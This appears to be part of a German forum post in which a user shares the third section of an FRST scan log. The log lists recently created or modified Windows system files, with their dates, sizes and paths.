2016-09-30 06:30 - 2016-09-15 18:52 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2016-09-30 06:30 - 2016-09-15 18:51 - 00762368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprddm.dll
2016-09-30 06:30 - 2016-09-15 18:50 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2016-09-30 06:30 - 2016-09-15 18:50 - 00071168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pwrshplugin.dll
2016-09-30 06:30 - 2016-09-15 18:49 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.InkControls.dll
2016-09-30 06:30 - 2016-09-15 18:48 - 01320448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll
2016-09-30 06:30 - 2016-09-15 18:46 - 00795648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MiracastReceiver.dll
2016-09-30 06:30 - 2016-09-15 18:46 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.BackgroundMediaPlayback.dll
2016-09-30 06:30 - 2016-09-15 18:46 - 00343040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2016-09-30 06:30 - 2016-09-15 18:45 - 02749440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2016-09-30 06:30 - 2016-09-15 18:45 - 00470016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.BackgroundMediaPlayer.dll
2016-09-30 06:30 - 2016-09-15 18:45 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dialclient.dll
2016-09-30 06:30 - 2016-09-15 18:44 - 02153984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll
2016-09-30 06:30 - 2016-09-15 18:44 - 00459776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.MediaPlayer.dll
2016-09-30 06:30 - 2016-09-15 18:44 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 03520512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\xpsrchvw.exe
2016-09-30 06:30 - 2016-09-15 18:43 - 03196416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cdp.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 00220672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToReceiver.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-09-30 06:30 - 2016-09-15 18:43 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2016-09-30 06:30 - 2016-09-15 18:42 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BackgroundMediaPolicy.dll
2016-09-30 06:30 - 2016-09-15 18:41 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-09-30 06:30 - 2016-09-15 18:41 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2016-09-30 06:30 - 2016-09-15 18:41 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Geolocation.dll
2016-09-30 06:30 - 2016-09-15 18:41 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\unimdm.tsp
2016-09-30 06:30 - 2016-09-15 18:40 - 03369984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 02138112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2016-09-30 06:30 - 2016-09-15 18:40 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Perception.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 01247232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.XboxLive.Storage.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmenrollengine.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Background.SystemEventsBroker.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.ServiceDiscovery.Dnssd.dll
2016-09-30 06:30 - 2016-09-15 18:40 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 01170944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Phone.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2016-09-30 06:30 - 2016-09-15 18:39 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll
2016-09-30 06:30 - 2016-09-15 18:38 - 00620544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-09-30 06:30 - 2016-09-15 18:38 - 00427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmrdvcore.dll
2016-09-30 06:30 - 2016-09-15 18:38 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvcext.dll
2016-09-30 06:30 - 2016-09-15 18:38 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 01507840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.FaceAnalysis.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlancfg.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.HostName.dll
2016-09-30 06:30 - 2016-09-15 18:37 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2016-09-30 06:30 - 2016-09-15 18:36 - 00448512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2016-09-30 06:30 - 2016-09-15 18:36 - 00387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-09-30 06:30 - 2016-09-15 18:36 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2016-09-30 06:30 - 2016-09-15 18:36 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00645120 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SessEnv.dll
2016-09-30 06:30 - 2016-09-15 18:35 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\rshx32.dll
2016-09-30 06:30 - 2016-09-15 18:34 - 00642048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.InkControls.dll
2016-09-30 06:30 - 2016-09-15 18:33 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-09-30 06:30 - 2016-09-15 18:33 - 01145344 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-09-30 06:30 - 2016-09-15 18:33 - 00966144 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbe.dll
2016-09-30 06:30 - 2016-09-15 18:33 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2016-09-30 06:30 - 2016-09-15 18:33 - 00560128 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2016-09-30 06:30 - 2016-09-15 18:31 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\pwrshplugin.dll
2016-09-30 06:30 - 2016-09-15 18:30 - 03776512 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-09-30 06:30 - 2016-09-15 18:30 - 01403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll
2016-09-30 06:30 - 2016-09-15 18:30 - 00713216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv2.sys
2016-09-30 06:30 - 2016-09-15 18:30 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Energy.dll
2016-09-30 06:30 - 2016-09-15 18:29 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvecpl.dll
2016-09-30 06:30 - 2016-09-15 18:28 - 00442368 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2016-09-30 06:30 - 2016-09-15 18:28 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\dialclient.dll
2016-09-30 06:30 - 2016-09-15 18:27 - 00796672 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvewiz.dll
2016-09-30 06:30 - 2016-09-15 18:27 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAC3ENC.DLL
2016-09-30 06:30 - 2016-09-15 18:25 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-09-30 06:30 - 2016-09-15 18:24 - 04596224 _____ (Microsoft Corporation) C:\WINDOWS\system32\xpsrchvw.exe
2016-09-30 06:30 - 2016-09-15 18:24 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2016-09-30 06:30 - 2016-09-15 18:24 - 00538624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll
2016-09-30 06:30 - 2016-09-15 18:24 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll
2016-09-30 06:30 - 2016-09-15 18:24 - 00139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Devices.dll
2016-09-30 06:30 - 2016-09-15 18:23 - 01040896 _____ (Microsoft Corporation) C:\WINDOWS\system32\NaturalLanguage6.dll
2016-09-30 06:30 - 2016-09-15 18:23 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2016-09-30 06:30 - 2016-09-15 18:22 - 00911872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2016-09-30 06:30 - 2016-09-15 18:20 - 02688512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-09-30 06:30 - 2016-09-15 18:20 - 02095616 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-09-30 06:30 - 2016-09-15 18:20 - 01984512 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-09-30 06:30 - 2016-09-15 18:20 - 00875520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2016-09-30 06:30 - 2016-09-15 18:20 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-09-30 06:30 - 2016-09-15 18:19 - 03617792 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-09-30 06:30 - 2016-09-15 18:19 - 01424896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2016-09-30 06:30 - 2016-09-15 18:19 - 01328128 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2016-09-30 06:30 - 2016-09-15 18:19 - 01013760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-09-30 06:30 - 2016-09-15 18:19 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2016-09-30 06:30 - 2016-09-15 18:18 - 00701952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2016-09-30 06:30 - 2016-09-15 18:17 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll
2016-09-30 06:30 - 2016-09-15 18:16 - 00998912 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2016-09-30 06:30 - 2016-09-15 18:16 - 00886784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2016-09-30 06:30 - 2016-09-15 18:16 - 00531456 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmCoreProvisioning.dll
2016-09-30 06:30 - 2016-09-15 16:00 - 00445765 _____ C:\WINDOWS\system32\ApnDatabase.xml
2016-09-30 06:30 - 2016-08-06 05:33 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\smphost.dll
2016-09-27 15:30 - 2016-09-27 15:30 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2016-09-27 15:27 - 2016-09-28 06:07 - 00000000 ____D C:\Users\maikp\AppData\Local\ConnectedDevicesPlatform
2016-09-27 15:27 - 2016-09-27 15:27 - 00000656 __RSH C:\Users\maikp\ntuser.pol
2016-09-27 15:27 - 2016-09-27 15:27 - 00000020 ___SH C:\Users\maikp\ntuser.ini
2016-09-27 13:05 - 2016-09-27 12:24 - 00000000 ___DC C:\WINDOWS\Panther
_____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlStringsRes.dll

RonnyP 17.10.2016 13:03
3/3 von FRST

Code:
2016-09-27 13:02 - 2016-09-27 13:02 - 09260032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmploc.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 09260032 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmploc.DLL
2016-09-27 13:02 - 2016-09-27 13:02 - 06574592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanmm.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 05511680 _____ (Microsoft Corporation) C:\WINDOWS\system32\aclui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 05384192 _____ (Microsoft) C:\WINDOWS\system32\dbgeng.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 04747776 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 04148224 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 03299328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 02852864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
2016-09-27 13:02 - 2016-09-27 13:02 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2016-09-27 13:02 - 2016-09-27 13:02 - 02537824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 02510848 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02481768 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02370048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02360832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02315264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02256224 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02183792 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 02049480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01966288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hevcdecoder.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01891328 _____ (Microsoft Corporation) C:\WINDOWS\system32\pnidui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01853232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01847048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01726976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Immersive.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01694712 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01656320 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01637888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01557296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01556992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Immersive.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01555456 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01453992 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01388544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Cred.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01362504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01359360 _____ (Microsoft Corporation) C:\WINDOWS\system32\usercpl.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01349120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01343928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01312768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorDataService.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 01293312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 01282048 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01274712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01232384 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01176664 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01081856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 01066328 _____ (Microsoft Corporation) C:\WINDOWS\system32\pidgenx.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00959104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00939872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pidgenx.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00895488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Streaming.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00881664 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00857440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WebcamUi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00811416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00798208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00790760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00782176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00781824 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00758784 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00755656 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneProviders.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00665768 _____ (Microsoft Corporation) C:\WINDOWS\system32\GenValObj.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00650240 _____ (Microsoft) C:\WINDOWS\system32\DbgModel.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00640976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00605184 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00595488 _____ (Microsoft Corporation) C:\WINDOWS\system32\mf.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00592384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GamePanel.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00540160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00529928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mf.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00523712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMRServer.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00521728 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00520192 _____ (Microsoft Corporation) C:\WINDOWS\system32\w32time.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00509952 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Bluetooth.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00495104 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00484352 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00468992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanconn.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00462336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00461312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00450392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00447488 _____ (Microsoft Corporation) C:\WINDOWS\system32\das.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00444416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00438784 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDec.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00423776 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifitask.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00409944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2016-09-27 13:02 - 2016-09-27 13:02 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00408600 _____ (Microsoft Corporation) C:\WINDOWS\system32\tsmf.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00396800 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00396168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00382272 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00379744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys
2016-09-27 13:02 - 2016-09-27 13:02 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2016-09-27 13:02 - 2016-09-27 13:02 - 00323584 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
